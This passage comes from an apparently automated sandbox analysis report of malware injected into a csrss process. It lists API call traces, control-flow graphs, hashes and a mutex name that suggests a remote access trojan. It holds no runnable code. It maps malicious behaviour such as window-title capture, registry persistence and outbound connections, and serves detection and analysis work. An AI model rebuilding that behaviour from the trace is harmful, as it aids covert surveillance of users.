33d8ad94 1103->1115 1106->1081 1107->1106 1119 33d8ae12-33d8ae19 1107->1119 1115->1081 1120 33d8adec-33d8adef 1116->1120 1118->1120 1121 33d8ae1b-33d8ae1c 1119->1121 1122 33d8ae55-33d8ae5b 1119->1122 1120->1102 1123 33d8ae1d-33d8ae2d WideCharToMultiByte 1121->1123 1122->1123 1123->1106 1124 33d8ae5d-33d8ae64 call 33d75e40 1123->1124 1124->1085
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000001,7FFFFFFF,?,?,?,?,33D8AE9A,00000001,00000001,00000000), ref: 33D8ACA3
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,33D8AE9A,00000001,00000001,00000000,?,?,?), ref: 33D8AD29
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 33D8AE23
                                                      • __freea.LIBCMT ref: 33D8AE30
                                                        • Part of subcall function 33D86137: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169
                                                      • __freea.LIBCMT ref: 33D8AE39
                                                      • __freea.LIBCMT ref: 33D8AE5E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: 6a06166d03f6d2cd3e9d78078ae88cf0ad5c5baec53fb34dae19faeafbab9b1f
                                                      • Instruction ID: fcccdb00ac0858ddc00d5b61cbf1c70849d52ccbd99d1bb83d976d27183ee56d
                                                      • Opcode Fuzzy Hash: 6a06166d03f6d2cd3e9d78078ae88cf0ad5c5baec53fb34dae19faeafbab9b1f
                                                      • Instruction Fuzzy Hash: 2751B4B6B00316AFEB168F64CC40EAB77AAEF44B54F554A29FD04DF140EB74EC5186A0

                                                      Control-flow Graph

                                                      APIs
                                                      • Sleep.KERNEL32(000001F4), ref: 33D4AD43
                                                      • GetForegroundWindow.USER32 ref: 33D4AD49
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 33D4AD52
                                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 33D4AD86
                                                      • Sleep.KERNEL32(000003E8), ref: 33D4AE54
                                                        • Part of subcall function 33D4A636: SetEvent.KERNEL32(?,?,?,33D4B82F,?,?,?,?,?,00000000), ref: 33D4A662
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Window$SleepText$EventForegroundLength
                                                      • String ID:
                                                      • API String ID: 828943121-0
                                                      • Opcode ID: 723232dcd066030330fc2af7c7c6f145593145aaf8e01ce94c22f8a0bf685ca4
                                                      • Instruction ID: a789935d420c7de8f2019c3ecc3f2db08ee79c8378e4856e22b87cf95a2923e7
                                                      • Opcode Fuzzy Hash: 723232dcd066030330fc2af7c7c6f145593145aaf8e01ce94c22f8a0bf685ca4
                                                      • Instruction Fuzzy Hash: C151F572E083419BD714EB34C894AAF7BE9AF94600F44092DF49693AD1EF34D949C7A2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1236 33d5c3f1-33d5c402 1237 33d5c404-33d5c407 1236->1237 1238 33d5c41a-33d5c421 1236->1238 1240 33d5c410-33d5c418 1237->1240 1241 33d5c409-33d5c40e 1237->1241 1239 33d5c422-33d5c43b CreateFileW 1238->1239 1242 33d5c441-33d5c446 1239->1242 1243 33d5c43d-33d5c43f 1239->1243 1240->1239 1241->1239 1245 33d5c461-33d5c472 WriteFile 1242->1245 1246 33d5c448-33d5c456 SetFilePointer 1242->1246 1244 33d5c47f-33d5c484 1243->1244 1248 33d5c474 1245->1248 1249 33d5c476-33d5c47d CloseHandle 1245->1249 1246->1245 1247 33d5c458-33d5c45f CloseHandle 1246->1247 1247->1243 1248->1249 1249->1244
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000080,40000000,00000000,00000000,00000002,00000080,00000000), ref: 33D5C430
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 33D5C44D
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D5C459
                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 33D5C46A
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D5C477
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreatePointerWrite
                                                      • String ID:
                                                      • API String ID: 1852769593-0
                                                      • Opcode ID: dcd983cec9ad15155cef69e2f07feea21e733f4f4c260c9127145ea4c191ff13
                                                      • Instruction ID: 8db800132030b9acba6dd878b808071c24fea6b66ccb7eca7d52d6a0776138cf
                                                      • Opcode Fuzzy Hash: dcd983cec9ad15155cef69e2f07feea21e733f4f4c260c9127145ea4c191ff13
                                                      • Instruction Fuzzy Hash: 43118EB62052147FFA045E349C89EBB739CEB46AA6F004629F593D31C0CB21AC0A8621

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1250 33d8ef58-33d8ef82 call 33d88215 call 33d8f077 call 33d8ecec 1257 33d8ef88-33d8ef9d call 33d86137 1250->1257 1258 33d8ef84-33d8ef86 1250->1258 1262 33d8efcd 1257->1262 1263 33d8ef9f-33d8efb5 call 33d8f119 1257->1263 1259 33d8efdb-33d8efde 1258->1259 1265 33d8efcf-33d8efda call 33d86782 1262->1265 1266 33d8efba-33d8efc0 1263->1266 1265->1259 1268 33d8efdf-33d8efe3 1266->1268 1269 33d8efc2-33d8efc7 call 33d805dd 1266->1269 1271 33d8efea-33d8eff5 1268->1271 1272 33d8efe5 call 33d84636 1268->1272 1269->1262 1275 33d8f00c-33d8f026 1271->1275 1276 33d8eff7-33d8f001 1271->1276 1272->1271 1275->1265 1279 33d8f028-33d8f02f 1275->1279 1276->1275 1278 33d8f003-33d8f00b call 33d86782 1276->1278 1278->1275 1279->1265 1281 33d8f031-33d8f048 call 33d8ebc2 1279->1281 1281->1265 1285 33d8f04a-33d8f054 1281->1285 1285->1265
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                        • Part of subcall function 33D8F077: _abort.LIBCMT ref: 33D8F0A9
                                                        • Part of subcall function 33D8F077: _free.LIBCMT ref: 33D8F0DD
                                                        • Part of subcall function 33D8ECEC: GetOEMCP.KERNEL32(00000000,?,?,33D8EF75,?), ref: 33D8ED17
                                                      • _free.LIBCMT ref: 33D8EFD0
                                                      • _free.LIBCMT ref: 33D8F006
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorLast_abort
                                                      • String ID: XKz$XKz
                                                      • API String ID: 2991157371-3037279202
                                                      • Opcode ID: 778d9b736c8b461aba3a8fa0539cb77d93a8efc23777bb92b0a5677f634f591c
                                                      • Instruction ID: 387abfea14f0b7b319c5a73f05f0c7586855f75270b184a26ce9a6bf7b100979
                                                      • Opcode Fuzzy Hash: 778d9b736c8b461aba3a8fa0539cb77d93a8efc23777bb92b0a5677f634f591c
                                                      • Instruction Fuzzy Hash: FB31B376D04248AFEB00DFA9D440B99B7E8EF407A1F254199E5149F6A0EB32BD41CF61

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1333 33d5376f-33d53786 RegCreateKeyA 1334 33d537bf 1333->1334 1335 33d53788-33d537bd call 33d4247c call 33d41fab RegSetValueExA RegCloseKey 1333->1335 1337 33d537c1-33d537cf call 33d41fd8 1334->1337 1335->1337
                                                      APIs
                                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,33DA74AC), ref: 33D5377E
                                                      • RegSetValueExA.KERNEL32(33DA74AC,33DA74B8,00000000,?,00000000,00000000,33DB52F0,?,?,33D4F853,33DA74B8,33DA74AC), ref: 33D537A6
                                                      • RegCloseKey.ADVAPI32(33DA74AC,?,?,33D4F853,33DA74B8,33DA74AC), ref: 33D537B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: pth_unenc
                                                      • API String ID: 1818849710-4028850238
                                                      • Opcode ID: aca6a3ac1c68022c03061d4945c352d6aa6cae450d0cb473d2bd09660cecf27a
                                                      • Instruction ID: 318dc9f46e400fbc3534ab75b72af3d5730a1fdf18cce2e219cd0f22d79441cc
                                                      • Opcode Fuzzy Hash: aca6a3ac1c68022c03061d4945c352d6aa6cae450d0cb473d2bd09660cecf27a
                                                      • Instruction Fuzzy Hash: E7F09073840218BFEF00AFA1DC45EEE3B6CEF04650F104254FD1AA6010EB319E14DBA0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1343 33d448c8-33d448e8 connect 1344 33d448ee-33d448f1 1343->1344 1345 33d44a1b-33d44a1f 1343->1345 1346 33d44a17-33d44a19 1344->1346 1347 33d448f7-33d448fa 1344->1347 1348 33d44a97 1345->1348 1349 33d44a21-33d44a2f WSAGetLastError 1345->1349 1350 33d44a99-33d44a9e 1346->1350 1351 33d44926-33d44930 1347->1351 1352 33d448fc-33d44923 call 33d4531e call 33d42093 call 33d5b4ef 1347->1352 1348->1350 1349->1348 1353 33d44a31-33d44a34 1349->1353 1364 33d44941-33d4494e 1351->1364 1365 33d44932-33d4493c 1351->1365 1352->1351 1355 33d44a36-33d44a6f call 33d5cae1 call 33d452fd call 33d42093 call 33d5b4ef call 33d41fd8 1353->1355 1356 33d44a71-33d44a76 1353->1356 1355->1348 1357 33d44a7b-33d44a94 call 33d42093 * 2 call 33d5b4ef 1356->1357 1357->1348 1376 33d44987-33d44992 1364->1376 1377 33d44950-33d44973 call 33d42093 * 2 call 33d5b4ef 1364->1377 1365->1357 1387 33d449c4-33d449d1 1376->1387 1388 33d44994-33d449c2 call 33d42093 * 2 call 33d5b4ef 1376->1388 1401 33d44976-33d44982 1377->1401 1397 33d449d3-33d449f6 call 33d42093 * 2 call 33d5b4ef 1387->1397 1398 33d449f9-33d44a14 CreateEventW * 2 1387->1398 1388->1401 1397->1398 1398->1346 1401->1348
                                                      APIs
                                                      • connect.WS2_32(FFFFFFFF,00000000,00000000), ref: 33D448E0
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 33D44A00
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 33D44A0E
                                                      • WSAGetLastError.WS2_32 ref: 33D44A21
                                                        • Part of subcall function 33D5B4EF: GetLocalTime.KERNEL32(00000000), ref: 33D5B509
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                      • String ID:
                                                      • API String ID: 994465650-0
                                                      • Opcode ID: 4464c89949f2de8a7354072e265df6e2e0bafda437119ed1c2821b09302df375
                                                      • Instruction ID: c4788c2c95e56910f1a6e9663d5ee89dbe1e8a8076a56306d3c878961cabdbcd
                                                      • Opcode Fuzzy Hash: 4464c89949f2de8a7354072e265df6e2e0bafda437119ed1c2821b09302df375
                                                      • Instruction Fuzzy Hash: 9F411A65E00301BFEB107B7DC95742DBB76BB41144B80015CE45247E52EF2298A98BF3

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,33DB4F50), ref: 33D44DB3
                                                      • CreateThread.KERNEL32(00000000,00000000,?,33DB4EF8,00000000,00000000), ref: 33D44DC7
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D44DD2
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D44DDB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 3360349984-0
                                                      • Opcode ID: dbeedef07ffbdcc699191b7277ba0dcd9189b238971707ca2bd8decd26f1c7a9
                                                      • Instruction ID: b09f34907dbaef248ae0736515005903e3399382a0a83c7b3784f73fdaf026c0
                                                      • Opcode Fuzzy Hash: dbeedef07ffbdcc699191b7277ba0dcd9189b238971707ca2bd8decd26f1c7a9
                                                      • Instruction Fuzzy Hash: 6C41B272A48340AFDB04EB61CC54DBFB7EDAF94710F44091DF48292991DF209949C772
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 33D4A6AB
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,33D4A74D), ref: 33D4A6BA
                                                      • Sleep.KERNEL32(00002710,?,?,?,33D4A74D), ref: 33D4A6E7
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D4A6EE
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleSizeSleep
                                                      • String ID:
                                                      • API String ID: 1958988193-0
                                                      • Opcode ID: 197011858d3983fab2d69f59cecb7de83172de7118ce0b002b7064075dfe8abe
                                                      • Instruction ID: 2a9000392a5d26747d37e9725b989de1b963684d2582b57b52e43c433c07e1dc
                                                      • Opcode Fuzzy Hash: 197011858d3983fab2d69f59cecb7de83172de7118ce0b002b7064075dfe8abe
                                                      • Instruction Fuzzy Hash: EC114C76644B40EEF622BB24C896A1E3BEFBB45691F840408F2835B581CE616C99C765
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,33D6F9A6,00000000,00000000,?,33D8850D,33D6F9A6,00000000,00000000,00000000,?,33D88839,00000006,FlsSetValue), ref: 33D88598
                                                      • GetLastError.KERNEL32(?,33D8850D,33D6F9A6,00000000,00000000,00000000,?,33D88839,00000006,FlsSetValue,33D9F160,33D9F168,00000000,00000364,?,33D882E7), ref: 33D885A4
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,33D8850D,33D6F9A6,00000000,00000000,00000000,?,33D88839,00000006,FlsSetValue,33D9F160,33D9F168,00000000), ref: 33D885B2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 59fb358fa9b7c8b195c178a102f6bac6229dd264a2ebbfe975350c1cb087d2c1
                                                      • Instruction ID: 2dd2b97dfcf36450b1254a7692313ec94ba8d126bcf133f95e3e661811d6476c
                                                      • Opcode Fuzzy Hash: 59fb358fa9b7c8b195c178a102f6bac6229dd264a2ebbfe975350c1cb087d2c1
                                                      • Instruction Fuzzy Hash: 2901D437607322ABD7115A68CC44A477B98AB04FA2B550660FD46EF240DB30EA01CAE0
                                                      APIs
                                                      • getaddrinfo.WS2_32(00000000,00000000,00000000,33DB2ADC,H#z,00000000,33D55188,00000000,00000001), ref: 33D54F0B
                                                      • WSASetLastError.WS2_32(00000000), ref: 33D54F10
                                                        • Part of subcall function 33D54D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 33D54DD5
                                                        • Part of subcall function 33D54D86: LoadLibraryA.KERNEL32(?), ref: 33D54E17
                                                        • Part of subcall function 33D54D86: LoadLibraryA.KERNEL32(?), ref: 33D54E76
                                                        • Part of subcall function 33D54D86: GetProcAddress.KERNEL32(00000000,?), ref: 33D54E9E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$AddressDirectoryErrorLastProcSystemgetaddrinfo
                                                      • String ID: H#z
                                                      • API String ID: 261940356-2410801705
                                                      • Opcode ID: a00f91cb46c4461eba0e4469bf93ef67463d79d9620786c12c1c320e24cb2762
                                                      • Instruction ID: 0ce0e3b7de8c5a3d7f4784b011894773580010c69cab09bebd111dc09f0f83ef
                                                      • Opcode Fuzzy Hash: a00f91cb46c4461eba0e4469bf93ef67463d79d9620786c12c1c320e24cb2762
                                                      • Instruction Fuzzy Hash: 15D01233601121AFA751B66E8C00ABA96FCDB96B617050026F905E3500E6508C4286A5
                                                      APIs
                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,33D4EC08,0000000D,00000033,00000000,00000032,00000000,33DA739C,00000000,0000000E,00000000,33DA60BC,00000003), ref: 33D4D078
                                                      • GetLastError.KERNEL32 ref: 33D4D083
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorLastMutex
                                                      • String ID: Rmc-9VASLD
                                                      • API String ID: 1925916568-4148224459
                                                      • Opcode ID: 253e725d9ab45a91053f8fcc8b5216254d05d5c7419a2c3ac1cfddaadf8920f7
                                                      • Instruction ID: f0a30075074afde7fd8406eef9f1e54793f135b5a3ceef798dd4646f45f030f3
                                                      • Opcode Fuzzy Hash: 253e725d9ab45a91053f8fcc8b5216254d05d5c7419a2c3ac1cfddaadf8920f7
                                                      • Instruction Fuzzy Hash: 18D012B3A543009FEB482B70C45975839E59744701F800419F007E9AC0DA7445918621
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00000000,33D4A27D,?,00000000,00000000), ref: 33D4A1FE
                                                      • CreateThread.KERNEL32(00000000,00000000,33D4A267,?,00000000,00000000), ref: 33D4A20E
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00009289,?,00000000,00000000), ref: 33D4A21A
                                                        • Part of subcall function 33D4B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 33D4B172
                                                        • Part of subcall function 33D4B164: wsprintfW.USER32 ref: 33D4B1F3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CreateThread$LocalTimewsprintf
                                                      • String ID:
                                                      • API String ID: 465354869-0
                                                      • Opcode ID: 41e4b092867aaef8e3da4ac3dfb52d9cb9199268245111aefb520d48570c65e3
                                                      • Instruction ID: c3d8f4bc46cde15e61c1503fbf48cc544dee604bfecdf6b10412679df49703d3
                                                      • Opcode Fuzzy Hash: 41e4b092867aaef8e3da4ac3dfb52d9cb9199268245111aefb520d48570c65e3
                                                      • Instruction Fuzzy Hash: 5911E9B65003087EE220BB39DCC6CBF7B9DDF81198B40055DF88602952EE615E18CEF2
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?,33DB4EE0,33DB5598), ref: 33D44F81
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,33DB4EE0,33DB5598), ref: 33D44FCD
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004150,?,00000000,00000000), ref: 33D44FE0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Create$EventLocalThreadTime
                                                      • String ID:
                                                      • API String ID: 2532271599-0
                                                      • Opcode ID: 4d736551170583f07de321b336912ec19be95a9274eedd3566eeff323bca0f87
                                                      • Instruction ID: 5c5e4f4f2af903c551e50ea60b58bbd6d40e32a250b401849636c6951a3d9aca
                                                      • Opcode Fuzzy Hash: 4d736551170583f07de321b336912ec19be95a9274eedd3566eeff323bca0f87
                                                      • Instruction Fuzzy Hash: 9C11E9368003846EE720A7B6C80CEAB7FFC9BC2710F44054EF48257641DEB09186CBB2
                                                      APIs
                                                      • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 33D535CA
                                                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 33D535E7
                                                      • RegCloseKey.ADVAPI32(?), ref: 33D535F2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: b9e9ed655af5b4d9ba78d03242fd044fd71ba19e9df5deb02b0c3eb1083cf7ca
                                                      • Instruction ID: f06b63f22426f4ed4a5039bc44c6eabd641ecaa80aabbcf422dce6dd690c3315
                                                      • Opcode Fuzzy Hash: b9e9ed655af5b4d9ba78d03242fd044fd71ba19e9df5deb02b0c3eb1083cf7ca
                                                      • Instruction Fuzzy Hash: CB01D67A901128BBDF209B95CC09DDE7FBDDB84651F000159BA09E3200DB318E15DBB0
                                                      APIs
                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,33DB52F0), ref: 33D53714
                                                      • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 33D5372D
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 33D53738
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: 0cd6999cd56fb37a9a503c2de226a7acd2021cc2aaaebafb1c06f38356476516
                                                      • Instruction ID: 989ea747fdd2bc95df80cf0df22ad96de1ff3c94f467fff6c51c8858a86207c9
                                                      • Opcode Fuzzy Hash: 0cd6999cd56fb37a9a503c2de226a7acd2021cc2aaaebafb1c06f38356476516
                                                      • Instruction Fuzzy Hash: F1011D7680022DBBEF115FA1DC45DEA7F79EF05750F004154FE19A2110D7328976DBA0
                                                      APIs
                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 33D53569
                                                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,33DB52F0), ref: 33D53587
                                                      • RegCloseKey.ADVAPI32(?), ref: 33D53592
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: 54117bde25343cac3cff0db69e1a9440e71f6ec38b9a29cdae865d0d651248a0
                                                      • Instruction ID: 69e191843646cac7cbe41c5dffcfe46ae4fc437310d556b86f76681b5dbf8e2f
                                                      • Opcode Fuzzy Hash: 54117bde25343cac3cff0db69e1a9440e71f6ec38b9a29cdae865d0d651248a0
                                                      • Instruction Fuzzy Hash: 1EF01D76900218BFEF119FE0DC06FEE7BBCEB04711F104195BA09E6140E6315A54AB90
                                                      APIs
                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,33D4C19C,33DA6C48), ref: 33D53516
                                                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,33D4C19C,33DA6C48), ref: 33D5352A
                                                      • RegCloseKey.ADVAPI32(?,?,?,33D4C19C,33DA6C48), ref: 33D53535
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: 6d6c53b3283924a6da651bfdc1db10a73622453ecc9e39099d94ed227841065a
                                                      • Instruction ID: 5f3701891985f8bf68007021bfe7178e03451ca9666c01df9cae3288cd0a9419
                                                      • Opcode Fuzzy Hash: 6d6c53b3283924a6da651bfdc1db10a73622453ecc9e39099d94ed227841065a
                                                      • Instruction Fuzzy Hash: C7E0E572905238BBEF215FA2DD0DEEB7FACDF46AA0B014154BD0DA5101D6754E20D6E0
                                                      APIs
                                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,33DA60A4), ref: 33D53885
                                                      • RegSetValueExA.KERNEL32(33DA60A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,33D4C152,33DA6C48,00000001,000000AF,33DA60A4), ref: 33D538A0
                                                      • RegCloseKey.ADVAPI32(33DA60A4,?,?,?,33D4C152,33DA6C48,00000001,000000AF,33DA60A4), ref: 33D538AB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID:
                                                      • API String ID: 1818849710-0
                                                      • Opcode ID: af32c53c8771263c5c41b52c5d4a6ff9985301cc3acceb40992b97d1fb184cd1
                                                      • Instruction ID: fc390769935e9a287790cf361d7ec8cc10e6cf4bc57ffd1fb4e756856b74fe77
                                                      • Opcode Fuzzy Hash: af32c53c8771263c5c41b52c5d4a6ff9985301cc3acceb40992b97d1fb184cd1
                                                      • Instruction Fuzzy Hash: 6DE03976500218BBFF11AFA0CC06FEA7BACEB04A90F014154BF19E6140E7318A2497E0
                                                      APIs
                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 33D8EDE9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: 892c9fb093542a5f5148a2d316cafbc6aa09fc557ed200725586530b254db574
                                                      • Instruction ID: 5e55b0a7425eda78ae6374a47eecf253f5ea71e203d4e9ade754bfed7c5ff5f5
                                                      • Opcode Fuzzy Hash: 892c9fb093542a5f5148a2d316cafbc6aa09fc557ed200725586530b254db574
                                                      • Instruction Fuzzy Hash: 1D412B7450434C9BDB228E24CC84AE6BBBDDF45708F1808EDE5CA8B152D235BA45CF21
                                                      APIs
                                                        • Part of subcall function 33D5BFB7: GetCurrentProcess.KERNEL32(?,?,?,33D4DAAA,33DA725C,00000000), ref: 33D5BFC8
                                                        • Part of subcall function 33D5BFB7: IsWow64Process.KERNEL32(00000000,?,?,33D4DAAA,33DA725C,00000000), ref: 33D5BFCF
